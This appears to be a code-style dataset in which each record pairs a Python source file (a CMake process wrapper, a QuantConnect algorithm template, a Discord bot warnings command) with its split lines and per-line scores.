0, 0, 0.022727272727272728, 0, 0.03571428571428571, 0.03125, 0.022727272727272728, 0.030303030303030304, 0, 0, 0.013888888888888888, 0.0379746835443038, 0.06, 0.00847457627118644, 0.021739130434782608, 0.008620689655172414, 0.05, 0.010526315789473684, 0.009523809523809525, 0, 0.08333333333333333, 0.03636363636363636, 0, 0, 0, 0.022727272727272728, 0.020833333333333332, 0.02, 0.027777777777777776, 0.019230769230769232, 0, 0.03571428571428571, 0.03125, 0.032520325203252036, 0.04, 0.02631578947368421, 0, 0.0379746835443038, 0.0375, 0.02631578947368421, 0.010309278350515464, 0.04, 0.05084745762711865, 0.006211180124223602, 0.022727272727272728, 0.008849557522123894, 0.05, 0.028901734104046242, 0, 0.05555555555555555, 0.05, 0.0136986301369863, 0, 0.03333333333333333, 0, 0.027777777777777776, 0.025, 0.022727272727272728, 0, 0.038461538461538464, 0.03571428571428571, 0.034782608695652174, 0.02127659574468085, 0.047619047619047616, 0.05405405405405406, 0.028985507246376812, 0.045454545454545456, 0.03333333333333333, 0.011235955056179775, 0.04477611940298507, 0.05454545454545454, 0.007194244604316547, 0.022727272727272728, 0.009523809523809525, 0, 0.045454545454545456, 0, 0.07692307692307693, 0.023255813953488372, 0.045454545454545456, 0.057692307692307696, 0.009523809523809525, 0.02564102564102564, 0.013333333333333334, 0.03636363636363636, 0, 0, 0.04, 0, 0, 0.0449438202247191, 0, 0.01818181818181818, 0.017241379310344827, 0, 0, 0, 0.013333333333333334, 0.015384615384615385, 0.05, 0, 0.058823529411764705, 0.09523809523809523, 0, 0, 0.02564102564102564, 0.020833333333333332, 0.0196078431372549, 0, 0.030303030303030304, 0, 0.04878048780487805, 0.03, 0.006289308176100629, 0.03225806451612903, 0.05, 0, 0.06451612903225806, 0.02127659574468085, 0.00909090909090909, 0.0125, 0.009615384615384616, 0, 0.034482758620689655, 0.06666666666666667, 0.10714285714285714, 0, 0, 0.07142857142857142, 0.021739130434782608, 0.03333333333333333, 0.04, 0.041666666666666664, 0.04, 
0.014084507042253521, 0.019230769230769232, 0.013888888888888888, 0.0196078431372549, 0.017241379310344827, 0, 0.03571428571428571, 0.018518518518518517, 0.02631578947368421, 0.017857142857142856, 0.0196078431372549, 0.021352313167259787, 0, 0.125, 0, 0.07692307692307693, 0.034482758620689655, 0.12162162162162163, 0.018518518518518517, 0.03125, 0.13793103448275862, 0.014925373134328358, 0.045454545454545456, 0.06172839506172839, 0.027777777777777776, 0.06976744186046512, 0, 0.03125, 0, 0.04, 0.03225806451612903, 0.05, 0.06818181818181818, 0.02127659574468085, 0.01, 0.0125, 0.009615384615384616, 0, 0.04, 0, 0.009708737864077669, 0.030927835051546393, 0.006289308176100629, 0, 0.0136986301369863, 0.024390243902439025, 0, 0, 0, 0, 0.022727272727272728, 0, 0.01818181818181818, 0, 0.014388489208633094, 0.05084745762711865, 0, 0.018691588785046728, 0.020833333333333332, 0.0196078431372549, 0.03636363636363636, 0.03225806451612903, 0.016666666666666666, 0.012345679012345678, 0.03305785123966942, 0.015625, 0.011494252873563218, 0.011764705882352941, 0.037037037037037035, 0.04054054054054054, 0.00546448087431694, 0.014492753623188406, 0.0125, 0.008547008547008548, 0, 0.045454545454545456, 0.0136986301369863, 0.024390243902439025, 0, 0, 0, 0.05263157894736842, 0.047619047619047616, 0.045454545454545456, 0.058823529411764705, 0.05555555555555555, 0, 0, 0.022727272727272728, 0.023255813953488372, 0, 0.01818181818181818, 0, 0.014388489208633094, 0.05084745762711865, 0, 0.018691588785046728, 0.020833333333333332, 0.0196078431372549, 0.03636363636363636, 0.047619047619047616, 0.029411764705882353, 0.017543859649122806, 0.023255813953488372, 0.022727272727272728, 0.015873015873015872, 0.03278688524590164, 0, 0.0594059405940594, 0.057692307692307696, 0, 0, 0.02857142857142857, 0.016666666666666666, 0, 0.013888888888888888, 0, 0.018018018018018018, 0.034782608695652174, 0.06521739130434782, 0.013513513513513514, 0.008620689655172414, 0.0125, 0.009615384615384616, 0, 
0.05263157894736842, 0.06666666666666667, 0.10714285714285714, 0.06153846153846154, 0.09523809523809523, 0.0625, 0.01694915254237288, 0, 0.0625, 0.03125, 0.009615384615384616, 0.02857142857142857, 0.013513513513513514, 0.014925373134328358, 0.02631578947368421, 0, 0.022727272727272728, 0.013513513513513514, 0.03571428571428571, 0, 0, 0.04477611940298507, 0.041666666666666664, 0.02702702702702703, 0.01818181818181818, 0, 0.018018018018018018, 0.02459016393442623, 0.04819277108433735, 0.057692307692307696, 0.02531645569620253, 0.046875, 0.02040816326530612, 0.012345679012345678, 0.023809523809523808, 0.013333333333333334, 0.009259259259259259, 0, 0.02702702702702703, 0.013333333333333334, 0.037037037037037035, 0, 0.041666666666666664, 0.058823529411764705, 0.037037037037037035, 0.03125, 0, 0.023255813953488372, 0.027777777777777776, 0, 0.022222222222222223, 0, 0.043478260869565216, 0.038461538461538464, 0.023809523809523808, 0.01904761904761905, 0.024390243902439025, 0.011363636363636364, 0.02702702702702703, 0.022222222222222223, 0.008928571428571428, 0, 0, 0.05263157894736842, 0.08333333333333333, 0.014925373134328358, 0.020833333333333332, 0.016666666666666666, 0.020202020202020204, 0.014084507042253521, 0, 0.018518518518518517, 0.0136986301369863, 0, 0.125, 0.023809523809523808, 0.019230769230769232, 0, 0.04597701149425287, 0.02631578947368421, 0.058823529411764705, 0.022727272727272728, 0.025, 0.04040404040404041, 0.057692307692307696, 0.058823529411764705, 0.03333333333333333, 0.012048192771084338, 0.03870967741935484, 0.02857142857142857, 0.04411764705882353, 0.0625, 0.0196078431372549, 0.009259259259259259, 0.022727272727272728, 0.008928571428571428, 0, 0, 0.038461538461538464, 0.03260869565217391, 0.012658227848101266, 0.024691358024691357, 0.034482758620689655, 0.0410958904109589, 0.020618556701030927, 0.009174311926605505, 0.009009009009009009, 0, 0.022222222222222223, 0.023255813953488372, 0, 0.008695652173913044, 0.02857142857142857, 
0.009259259259259259, 0, 0.030303030303030304, 0.012658227848101266, 0.012048192771084338, 0, 0.011764705882352941, 0, 0.012658227848101266, 0.012048192771084338, 0, 0.011764705882352941, 0, 0, 0.03571428571428571, 0.025, 0.008695652173913044, 0.02857142857142857, 0.009615384615384616, 0, 0.022988505747126436, 0.010101010101010102, 0.09523809523809523, 0.07142857142857142, 0.06451612903225806, 0, 0.013157894736842105, 0.017543859649122806, 0.017241379310344827, 0, 0.009433962264150943, 0, 0, 0.011627906976744186, 0.0625, 0.06, 0.03571428571428571, 0, 0, 0, 0, 0.05, 0, 0, 0, 0.018867924528301886, 0.04, 0, 0.014925373134328358, 0, 0.058823529411764705, 0, 0.018867924528301886, 0.030303030303030304, 0, 0.014492753623188406, 0.01694915254237288, 0.014285714285714285, 0.05555555555555555, 0, 0, 0.017857142857142856, 0.03225806451612903, 0.021739130434782608, 0.014492753623188406, 0.03488372093023256, 0, 0.0196078431372549, 0.018867924528301886, 0.015384615384615385, 0.0625, 0.02040816326530612, 0, 0.022222222222222223, 0.037037037037037035, 0, 0, 0, 0.014925373134328358, 0, 0.037037037037037035, 0.08, 0.05, 0.022727272727272728, 0, 0.022988505747126436, 0.017241379310344827, 0.023255813953488372, 0, 0.010526315789473684, 0, 0, 0, 0.057692307692307696, 0.017857142857142856, 0, 0.015384615384615385, 0.03529411764705882, 0, 0, 0.017543859649122806, 0.029850746268656716, 0.0975609756097561, 0.02564102564102564, 0.018867924528301886, 0.04838709677419355, 0, 0, 0.047619047619047616, 0, 0.017543859649122806, 0.014492753623188406, 0.02631578947368421, 0.03225806451612903, 0, 0, 0.043478260869565216, 0.03225806451612903, 0, 0.02564102564102564, 0.02040816326530612, 0.06060606060606061, 0, 0.05555555555555555, 0.07608695652173914, 0.043478260869565216, 0.13333333333333333, 0, 0.024390243902439025, 0.03225806451612903, 0, 0, 0.03225806451612903, 0, 0.016, 0.014705882352941176, 0.018518518518518517, 0, 0.01818181818181818, 0.015625, 0.010416666666666666, 0, 0, 0.017543859649122806, 
0.05, 0.019230769230769232, 0.04716981132075472, 0.018867924528301886, 0.012345679012345678, 0, 0.012195121951219513, 0, 0, 0, 0.018518518518518517, 0.05263157894736842, 0.018867924528301886, 0, 0, 0, 0, 0, 0, 0, 0, 0.018518518518518517, 0.05263157894736842, 0.024691358024691357, 0, 0.012195121951219513, 0, 0.0392156862745098, 0.018867924528301886, 0, 0, 0, 0, 0, 0, 0, 0.017857142857142856, 0, 0.02040816326530612, 0, 0, 0, 0, 0.03571428571428571, 0.018867924528301886, 0, 0.0625, 0.03896103896103896, 0.0375, 0, 0, 0, 0, 0, 0.03, 0, 0, 0.05555555555555555, 0, 0.08771929824561403, 0.034482758620689655, 0.04878048780487805, 0, 0.03125, 0.029411764705882353, 0.03225806451612903, 0.022727272727272728, 0, 0, 0.047619047619047616, 0, 0.021739130434782608, 0, 0, 0.030303030303030304, 0, 0.024390243902439025, 0, 0, 0.0625, 0.05, 0, 0.023255813953488372, 0.0125, 0.031578947368421054, 0, 0, 0.01694915254237288, 0.0392156862745098, 0, 0, 0, 0, 0, 0.030303030303030304, 0, 0.06097560975609756, 0, 0.02, 0.014705882352941176, 0.025, 0.038461538461538464, 0.011834319526627219, 0.02702702702702703, 0.021739130434782608, 0.014925373134328358, 0.018518518518518517, 0, 0.009259259259259259, 0.013986013986013986, 0, 0.0196078431372549, 0.01818181818181818, 0.017241379310344827, 0, 0, 0.02127659574468085, 0.022222222222222223, 0.024096385542168676, 0, 0.012195121951219513, 0.016260162601626018, 0.03773584905660377, 0, 0, 0.018018018018018018, 0.017241379310344827, 0.024691358024691357, 0.018518518518518517, 0.024390243902439025, 0.02197802197802198, 0.01694915254237288, 0.024390243902439025, 0, 0.014598540145985401, 0.023809523809523808, 0.015384615384615385, 0.015873015873015872, 0.013888888888888888, 0, 0.027777777777777776, 0.017857142857142856, 0.01639344262295082, 0.0125, 0.008928571428571428, 0, 0.0125, 0.024390243902439025, 0.007194244604316547, 0, 0, 0.056338028169014086, 0.08163265306122448, 0, 0.023809523809523808, 0, 0.04, 0, 0, 0.027522935779816515, 0, 0, 0.014388489208633094, 
0, 0, 0, 0, 0, 0.018691588785046728, 0.011764705882352941, 0.021052631578947368, 0, 0.013986013986013986, 0.020833333333333332, 0.04, 0.043478260869565216, 0.05263157894736842, 0, 0.010309278350515464, 0.01910828025477707, 0, 0.030303030303030304, 0.03571428571428571, 0, 0.013513513513513514, 0.045454545454545456, 0.05263157894736842, 0.05, 0, 0, 0, 0.03571428571428571, 0.02857142857142857, 0, 0, 0, 0.041666666666666664, 0.024390243902439025, 0, 0, 0, 0, 0.024390243902439025, 0, 0.015873015873015872, 0, 0.022058823529411766, 0, 0.05, 0, 0.009523809523809525, 0.015625, 0, 0.034482758620689655, 0, 0.014705882352941176, 0.05, 0.06666666666666667, 0, 0, 0, 0, 0, 0.05, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.029411764705882353, 0, 0.00909090909090909, 0.044444444444444446, 0.009708737864077669, 0, 0, 0, 0, 0, 0, 0.016666666666666666, 0.018518518518518517, 0.057971014492753624, 0.125, 0.06172839506172839, 0.125, 0.044444444444444446, 0, 0, 0, 0, 0.061224489795918366, 0, 0.09090909090909091, 0.030303030303030304, 0, 0.017857142857142856, 0, 0.017241379310344827, 0, 0.017857142857142856, 0, 0.028846153846153848, 0, 0.03571428571428571, 0, 0.015625, 0, 0.016666666666666666, 0.030303030303030304, 0, 0.125, 0.015384615384615385, 0, 0, 0.029411764705882353, 0, 0, 0, 0, 0, 0, 0.037037037037037035, 0.058823529411764705, 0.015151515151515152, 0, 0, 0.038461538461538464, 0.061224489795918366, 0.015625, 0, 0, 0.016666666666666666, 0.019230769230769232, 0.012658227848101266, 0, 0.125, 0.04477611940298507, 0.04918032786885246, 0, 0, 0, 0, 0.043859649122807015, 0.03571428571428571, 0.045454545454545456, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0, 0.09090909090909091, 0.030303030303030304, 0.019230769230769232, 0.018518518518518517, 0.019230769230769232, 0, 0.015625, 0, 0.018518518518518517, 0.125, 0.015384615384615385, 0, 0, 0.029411764705882353, 0, 0, 0.0136986301369863, 0, 0, 0.037037037037037035, 0, 0, 0, 0.029411764705882353, 0, 0, 0, 0, 0, 0.03333333333333333, 0, 0, 0, 0, 0, 
0.0423728813559322, 0, 0, 0, 0, 0, 0, 0.029411764705882353, 0, 0, 0, 0, 0, 0, 0.125, 0, 0, 0, 0, 0, 0, 0.00303951367781155, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.013513513513513514, 0, 0, 0, 0, 0, 0, 0, 0.0045871559633027525, 0, 0, 0, 0.023809523809523808, 0, 0, 0, 0, 0, 0.021739130434782608, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.058823529411764705, 0, 0, 0.011235955056179775, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.04918032786885246, 0.023255813953488372, 0.05555555555555555, 0, 0, 0.0625, 0.13333333333333333, 0.008771929824561403, 0, 0.03125, 0, 0, 0, 0, 0, 0.012345679012345678, 0.035398230088495575, 0, 0, 0, 0, 0.11538461538461539, 0.03125, 0.03571428571428571, 0, 0.06521739130434782, 0.023529411764705882, 0.04, 0.03773584905660377, 0.023529411764705882, 0.04, 0.05357142857142857, 0.023529411764705882, 0, 0.06521739130434782, 0.028037383177570093, 0.02, 0.03278688524590164, 0.03773584905660377, 0.04, 0.05357142857142857, 0.023529411764705882, 0, 0.008, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02127659574468085, 0, 0, 0.03333333333333333, 0.045454545454545456, 0, 0.08333333333333333, 0, 0.05555555555555555, 0.014925373134328358, 0.014705882352941176, 0.02962962962962963, 0.07407407407407407, 0, 0.02, 0.034482758620689655, 0.03225806451612903, 0, 0.012658227848101266, 0, 0.03260869565217391, 0, 0.018518518518518517, 0, 0, 0, 0, 0, 0.04918032786885246, 0, 0.008333333333333333, 0, 0, 0, 0, 0, 0.04918032786885246, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08333333333333333, 0.0625, 0.015873015873015872, 0.021505376344086023, 0.023255813953488372, 0.02857142857142857, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01818181818181818, 0.03125, 0.016, 0.012658227848101266, 0.06666666666666667, 0, 0, 0, 0, 0, 0, 0.005208333333333333, 0.014705882352941176, 0.024390243902439025, 0.034482758620689655, 0.034482758620689655, 0.009345794392523364, 0.00975609756097561, 0.006578947368421052, 0.1, 0, 0.023809523809523808, 0, 0.047619047619047616, 0.03571428571428571, 0.029411764705882353, 
0.046511627906976744, 0.022727272727272728, 0, 0, 0, 0.03571428571428571, 0.0196078431372549, 0, 0, 0.045454545454545456, 0.09523809523809523, 0.15384615384615385, 0, 0, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0, 0, 0.018867924528301886, 0.15384615384615385, 0.01818181818181818, 0.15384615384615385, 0.014925373134328358, 0.15384615384615385, 0.02857142857142857, 0.15384615384615385, 0.030303030303030304, 0.15384615384615385, 0.019230769230769232, 0.15384615384615385, 0.015151515151515152, 0.15384615384615385, 0.022222222222222223, 0.15384615384615385, 0.01818181818181818, 0.15384615384615385, 0.02857142857142857, 0.15384615384615385, 0.015384615384615385, 0.15384615384615385, 0.015873015873015872, 0.15384615384615385, 0, 0.0196078431372549, 0.15384615384615385, 0.015151515151515152, 0.15384615384615385, 0.01282051282051282, 0.15384615384615385, 0.030303030303030304, 0.15384615384615385, 0.017241379310344827, 0.15384615384615385, 0.013888888888888888, 0.15384615384615385, 0.0196078431372549, 0.15384615384615385, 0.01639344262295082, 0.15384615384615385, 0.024390243902439025, 0.15384615384615385, 0.014084507042253521, 0.15384615384615385, 0.014492753623188406, 0.15384615384615385, 0, 0.058823529411764705, 0, 0.07142857142857142, 0, 0.041666666666666664, 0.041666666666666664, 0.011363636363636364, 0, 0, 0.03333333333333333, 0, 0.009900990099009901, 0, 0, 0.00980392156862745, 0, 0, 0, 0, 0.010309278350515464, 0, 0.010638297872340425, 0, 0, 0, 0, 0, 0.010638297872340425, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.11764705882352941, 0.11764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.07142857142857142, 0, 0, 0, 0, 0.011111111111111112, 0.03571428571428571, 0, 0, 0, 0.01282051282051282, 0, 0.08333333333333333, 0.01639344262295082, 0.07894736842105263, 0, 0, 0, 0, 0, 0, 
0.0625, 0, 0, 0, 0.07142857142857142, 0, 0, 0, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 0.03225806451612903, 0.02127659574468085, 0.07692307692307693, 0.037037037037037035, 0.043478260869565216, 0.0392156862745098, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0, 0.038461538461538464, 0, 0, 0, 0, 0, 0.038461538461538464, 0, 0.03571428571428571, 0, 0.045454545454545456, 0, 0.045454545454545456, 0, 0.041666666666666664, 0, 0, 0, 0, 0.023255813953488372 ]
1,596
0.021424
false
""" Class for accessing the cmake process """ import shutil, subprocess, os from pylib.logwrapper import LogWrapper from pylib.process import Process # Wrapper class for logging class CMakeProcess(Process): def __init__(self): super().__init__() self.log = LogWrapper.getlogger() self.ExePath = "cmake.exe" # CMake Process options self.Generator = None self.AdditionalOptions = None self.SrcDir = None def SetupOutputDir(self): # Setup Output directory if os.path.exists(self.WorkingDir): self.log.warn("Cleaning Output Directory: " + self.WorkingDir) shutil.rmtree(self.WorkingDir, ignore_errors=True) os.makedirs(self.WorkingDir) return def Start(self): self.log.info("Starting generation of cmake files") if self.Options == None: self.Options = [] self.Options = self.Options + self.GenerateCmdLineOpts() self.log.info("CMake: Launching:") self.log.info("CMake: Command: " + " ".join(str(x) for x in self.Options)) super().Start() return # Generate Command Line Options def GenerateCmdLineOpts(self): ret = [] if self.Generator != None: ret.append("-G" + self.Generator) if self.AdditionalOptions != None: ret = ret + self.AdditionalOptions if self.SrcDir != None: ret.append(self.SrcDir) return ret
[ "\"\"\"\n", "Class for accessing the cmake process\n", "\"\"\"\n", "\n", "import shutil, subprocess, os\n", "from pylib.logwrapper import LogWrapper\n", "from pylib.process import Process\n", "\n", "# Wrapper class for logging\n", "class CMakeProcess(Process):\n", "\n", " def __init__(self):\n", " super().__init__()\n", " self.log = LogWrapper.getlogger()\n", " self.ExePath = \"cmake.exe\"\n", "\n", " # CMake Process options\n", " self.Generator = None\n", " self.AdditionalOptions = None\n", " self.SrcDir = None\n", "\n", " def SetupOutputDir(self):\n", " # Setup Output directory\n", " if os.path.exists(self.WorkingDir):\n", " self.log.warn(\"Cleaning Output Directory: \" + self.WorkingDir)\n", " shutil.rmtree(self.WorkingDir, ignore_errors=True)\n", " os.makedirs(self.WorkingDir)\n", " return\n", "\n", " def Start(self):\n", " self.log.info(\"Starting generation of cmake files\")\n", "\n", " if self.Options == None: self.Options = []\n", " self.Options = self.Options + self.GenerateCmdLineOpts()\n", "\n", " self.log.info(\"CMake: Launching:\")\n", " self.log.info(\"CMake: Command: \" + \" \".join(str(x) for x in self.Options))\n", "\n", " super().Start()\n", " return\n", "\n", " # Generate Command Line Options\n", " def GenerateCmdLineOpts(self):\n", " ret = []\n", " if self.Generator != None: ret.append(\"-G\" + self.Generator)\n", " if self.AdditionalOptions != None: ret = ret + self.AdditionalOptions\n", " if self.SrcDir != None: ret.append(self.SrcDir)\n", " return ret\n" ]
[ 0, 0, 0, 0, 0.03333333333333333, 0, 0, 0, 0, 0.034482758620689655, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.0392156862745098, 0, 0, 0, 0.012048192771084338, 0, 0, 0, 0, 0, 0, 0, 0.028985507246376812, 0.02564102564102564, 0.03571428571428571, 0 ]
48
0.004363
false
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals. # Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from clr import AddReference AddReference("System") AddReference("QuantConnect.Algorithm") AddReference("QuantConnect.Algorithm.Framework") AddReference("QuantConnect.Common") from System import * from QuantConnect import * from QuantConnect.Orders import * from QuantConnect.Algorithm import * from QuantConnect.Algorithm.Framework import * from QuantConnect.Algorithm.Framework.Alphas import * from QuantConnect.Algorithm.Framework.Execution import * from QuantConnect.Algorithm.Framework.Portfolio import * from QuantConnect.Algorithm.Framework.Risk import * from QuantConnect.Algorithm.Framework.Selection import * from datetime import timedelta import numpy as np ### <summary> ### Basic template framework algorithm uses framework components to define the algorithm. ### </summary> ### <meta name="tag" content="using data" /> ### <meta name="tag" content="using quantconnect" /> ### <meta name="tag" content="trading and orders" /> class BasicTemplateFrameworkAlgorithm(QCAlgorithm): '''Basic template framework algorithm uses framework components to define the algorithm.''' def Initialize(self): ''' Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. 
All algorithms must initialized.''' # Set requested data resolution self.UniverseSettings.Resolution = Resolution.Minute self.SetStartDate(2013,10,7) #Set Start Date self.SetEndDate(2013,10,11) #Set End Date self.SetCash(100000) #Set Strategy Cash # Find more symbols here: http://quantconnect.com/data # Forex, CFD, Equities Resolutions: Tick, Second, Minute, Hour, Daily. # Futures Resolution: Tick, Second, Minute # Options Resolution: Minute Only. symbols = [ Symbol.Create("SPY", SecurityType.Equity, Market.USA) ] # set algorithm framework models self.SetUniverseSelection(ManualUniverseSelectionModel(symbols)) self.SetAlpha(ConstantAlphaModel(InsightType.Price, InsightDirection.Up, timedelta(minutes = 20), 0.025, None)) self.SetPortfolioConstruction(EqualWeightingPortfolioConstructionModel()) self.SetExecution(ImmediateExecutionModel()) self.SetRiskManagement(MaximumDrawdownPercentPerSecurity(0.01)) self.Debug("numpy test >>> print numpy.pi: " + str(np.pi)) def OnOrderEvent(self, orderEvent): if orderEvent.Status == OrderStatus.Filled: self.Debug("Purchased Stock: {0}".format(orderEvent.Symbol))
[ "# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.\n", "# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.\n", "#\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n", "#\n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "\n", "from clr import AddReference\n", "AddReference(\"System\")\n", "AddReference(\"QuantConnect.Algorithm\")\n", "AddReference(\"QuantConnect.Algorithm.Framework\")\n", "AddReference(\"QuantConnect.Common\")\n", "\n", "from System import *\n", "from QuantConnect import *\n", "from QuantConnect.Orders import *\n", "from QuantConnect.Algorithm import *\n", "from QuantConnect.Algorithm.Framework import *\n", "from QuantConnect.Algorithm.Framework.Alphas import *\n", "from QuantConnect.Algorithm.Framework.Execution import *\n", "from QuantConnect.Algorithm.Framework.Portfolio import *\n", "from QuantConnect.Algorithm.Framework.Risk import *\n", "from QuantConnect.Algorithm.Framework.Selection import *\n", "from datetime import timedelta\n", "import numpy as np\n", "\n", "### <summary>\n", "### Basic template framework algorithm uses framework components to define the algorithm.\n", "### </summary>\n", "### <meta name=\"tag\" content=\"using data\" />\n", "### <meta name=\"tag\" content=\"using quantconnect\" />\n", "### <meta name=\"tag\" content=\"trading and orders\" />\n", "class BasicTemplateFrameworkAlgorithm(QCAlgorithm):\n", " '''Basic template framework algorithm uses framework components to define the algorithm.'''\n", 
"\n", " def Initialize(self):\n", " ''' Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.'''\n", "\n", " # Set requested data resolution\n", " self.UniverseSettings.Resolution = Resolution.Minute\n", "\n", " self.SetStartDate(2013,10,7) #Set Start Date\n", " self.SetEndDate(2013,10,11) #Set End Date\n", " self.SetCash(100000) #Set Strategy Cash\n", "\n", " # Find more symbols here: http://quantconnect.com/data\n", " # Forex, CFD, Equities Resolutions: Tick, Second, Minute, Hour, Daily.\n", " # Futures Resolution: Tick, Second, Minute\n", " # Options Resolution: Minute Only.\n", " symbols = [ Symbol.Create(\"SPY\", SecurityType.Equity, Market.USA) ]\n", "\n", " # set algorithm framework models\n", " self.SetUniverseSelection(ManualUniverseSelectionModel(symbols))\n", " self.SetAlpha(ConstantAlphaModel(InsightType.Price, InsightDirection.Up, timedelta(minutes = 20), 0.025, None))\n", " self.SetPortfolioConstruction(EqualWeightingPortfolioConstructionModel())\n", " self.SetExecution(ImmediateExecutionModel())\n", " self.SetRiskManagement(MaximumDrawdownPercentPerSecurity(0.01))\n", "\n", " self.Debug(\"numpy test >>> print numpy.pi: \" + str(np.pi))\n", "\n", " def OnOrderEvent(self, orderEvent):\n", " if orderEvent.Status == OrderStatus.Filled:\n", " self.Debug(\"Purchased Stock: {0}\".format(orderEvent.Symbol))\n" ]
[ 0, 0.012345679012345678, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0.037037037037037035, 0.029411764705882353, 0.02702702702702703, 0.02127659574468085, 0.018518518518518517, 0.017543859649122806, 0.017543859649122806, 0.019230769230769232, 0.017543859649122806, 0.03225806451612903, 0.05263157894736842, 0, 0.07142857142857142, 0.022222222222222223, 0.06666666666666667, 0.022222222222222223, 0.018867924528301886, 0.018867924528301886, 0.019230769230769232, 0.010416666666666666, 0, 0, 0.006535947712418301, 0, 0, 0, 0, 0.05454545454545454, 0.05660377358490566, 0.017241379310344827, 0, 0, 0, 0, 0, 0.02631578947368421, 0, 0, 0, 0.025, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0, 0 ]
69
0.011741
false
import discord from sigma.core.permission import check_man_msg async def warns(cmd, message, args): try: warned_users = cmd.db.get_settings(message.guild.id, 'WarnedUsers') except KeyError: cmd.db.set_settings(message.guild.id, 'WarnedUsers', {}) warned_users = {} if not check_man_msg(message.author, message.channel): target = message.author target_id = str(target.id) if target_id not in warned_users: embed = discord.Embed(color=0x0099FF, title='ℹ You Were Never Warned') else: embed = discord.Embed(color=0x0099FF) embed.add_field(name='ℹ You Were Warned For...', value='```\n- ' + '\n- '.join(warned_users[target_id]['Reasons']) + '\n```') await message.channel.send(None, embed=embed) return if not message.mentions: if len(warned_users) == 0: embed = discord.Embed(color=0x0099FF, title='ℹ There Are No Warned Users') else: warn_user_list = [] for key in warned_users: for member in message.guild.members: if member.id == warned_users[key]['UserID']: warn_user_list.append(f'{member.name}#{member.discriminator}') embed = discord.Embed(color=0x0099FF) embed.add_field(name='ℹ List of Warned Users', value='```\n' + ', '.join(warn_user_list) + '\n```') else: target = message.mentions[0] target_id = str(target.id) if target_id not in warned_users: embed = discord.Embed(color=0x0099FF, title='ℹ ' + target.name + ' Was Never Warned') else: embed = discord.Embed(color=0x0099FF) embed.add_field(name='ℹ ' + target.name + ' Was Warned For...', value='```\n- ' + '\n- '.join(warned_users[target_id]['Reasons']) + '\n```') await message.channel.send(None, embed=embed)
[ "import discord\n", "from sigma.core.permission import check_man_msg\n", "\n", "\n", "async def warns(cmd, message, args):\n", " try:\n", " warned_users = cmd.db.get_settings(message.guild.id, 'WarnedUsers')\n", " except KeyError:\n", " cmd.db.set_settings(message.guild.id, 'WarnedUsers', {})\n", " warned_users = {}\n", " if not check_man_msg(message.author, message.channel):\n", " target = message.author\n", " target_id = str(target.id)\n", " if target_id not in warned_users:\n", " embed = discord.Embed(color=0x0099FF, title='ℹ You Were Never Warned')\n", " else:\n", " embed = discord.Embed(color=0x0099FF)\n", " embed.add_field(name='ℹ You Were Warned For...',\n", " value='```\\n- ' + '\\n- '.join(warned_users[target_id]['Reasons']) + '\\n```')\n", " await message.channel.send(None, embed=embed)\n", " return\n", " if not message.mentions:\n", " if len(warned_users) == 0:\n", " embed = discord.Embed(color=0x0099FF, title='ℹ There Are No Warned Users')\n", " else:\n", " warn_user_list = []\n", " for key in warned_users:\n", " for member in message.guild.members:\n", " if member.id == warned_users[key]['UserID']:\n", " warn_user_list.append(f'{member.name}#{member.discriminator}')\n", " embed = discord.Embed(color=0x0099FF)\n", " embed.add_field(name='ℹ List of Warned Users', value='```\\n' + ', '.join(warn_user_list) + '\\n```')\n", " else:\n", " target = message.mentions[0]\n", " target_id = str(target.id)\n", " if target_id not in warned_users:\n", " embed = discord.Embed(color=0x0099FF, title='ℹ ' + target.name + ' Was Never Warned')\n", " else:\n", " embed = discord.Embed(color=0x0099FF)\n", " embed.add_field(name='ℹ ' + target.name + ' Was Warned For...',\n", " value='```\\n- ' + '\\n- '.join(warned_users[target_id]['Reasons']) + '\\n```')\n", " await message.channel.send(None, embed=embed)\n" ]
